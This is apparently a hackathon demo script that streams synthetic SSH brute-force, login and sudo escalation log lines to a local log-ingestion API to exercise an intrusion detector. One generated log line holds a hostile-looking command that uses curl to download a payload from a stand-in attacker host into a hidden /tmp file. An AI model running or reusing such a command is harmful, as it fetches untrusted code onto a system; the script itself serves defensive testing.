#!/usr/bin/env python3 """ Continuous hackathon demo: streams synthetic SSH brute-force + escalation lines to /ingest-logs. Usage: SENTINEL_API=http://127.0.0.1:8000 python scripts/continuous_demo.py DEMO_INTERVAL_SEC=2.5 python scripts/continuous_demo.py """ from __future__ import annotations import os import random import sys import time from datetime import datetime, timezone import httpx API = os.getenv("SENTINEL_API", "http://127.0.0.1:8000") INTERVAL = float(os.getenv("DEMO_INTERVAL_SEC", "2.0")) MALICIOUS_IPS = [ "185.220.101.44", "45.33.32.156", "203.0.113.77", "198.51.100.23", "192.0.2.50", ] def _ssh_fail(ip: str, user: str) -> str: ts = datetime.now(timezone.utc).strftime("%b %d %H:%M:%S") return f"{ts} demo-host sshd[{random.randint(1000, 9999)}]: Failed password for invalid user {user} from {ip} port 22 ssh2" def _ssh_ok(ip: str, user: str) -> str: ts = datetime.now(timezone.utc).strftime("%b %d %H:%M:%S") return f"{ts} demo-host sshd[{random.randint(1000, 9999)}]: Accepted publickey for {user} from {ip} port 22 ssh2" def _sudo_escalation(user: str) -> str: ts = datetime.now(timezone.utc).strftime("%b %d %H:%M:%S") return ( f"{ts} demo-host sudo: {user} : TTY=pts/0 ; USER=root ; " f"COMMAND=/usr/bin/curl -fsSL http://evil.example/payload -o /tmp/.{random.randint(1000,9999)}" ) def main() -> None: print(f"Streaming demo attacks to {API}/ingest-logs every {INTERVAL}s (Ctrl+C to stop)") cycle = 0 with httpx.Client(timeout=30.0) as client: while True: ip = random.choice(MALICIOUS_IPS) user = random.choice(["admin", "root", "ubuntu", "oracle"]) burst = random.randint(3, 6) for _ in range(burst): line = _ssh_fail(ip, user) r = client.post( f"{API.rstrip('/')}/ingest-logs", json={"source": "continuous_demo", "raw_line": line, "metadata": {"host": "demo-host"}}, ) print(cycle, r.status_code, line[:80]) time.sleep(max(0.2, INTERVAL / max(1, burst))) if random.random() < 0.45: line = _ssh_ok(ip, user) client.post( f"{API.rstrip('/')}/ingest-logs", json={"source": "continuous_demo", "raw_line": line, "metadata": {"host": "demo-host"}}, ) print(cycle, "OK", line[:80]) time.sleep(INTERVAL * 0.5) if random.random() < 0.35: line = _sudo_escalation(user) client.post( f"{API.rstrip('/')}/ingest-logs", json={"source": "continuous_demo", "raw_line": line, "metadata": {"host": "demo-host"}}, ) print(cycle, "SUDO", line[:80]) cycle += 1 time.sleep(INTERVAL) if __name__ == "__main__": try: main() except KeyboardInterrupt: print("Stopped.") sys.exit(0) except httpx.HTTPError as e: print("HTTP error:", e, file=sys.stderr) sys.exit(1)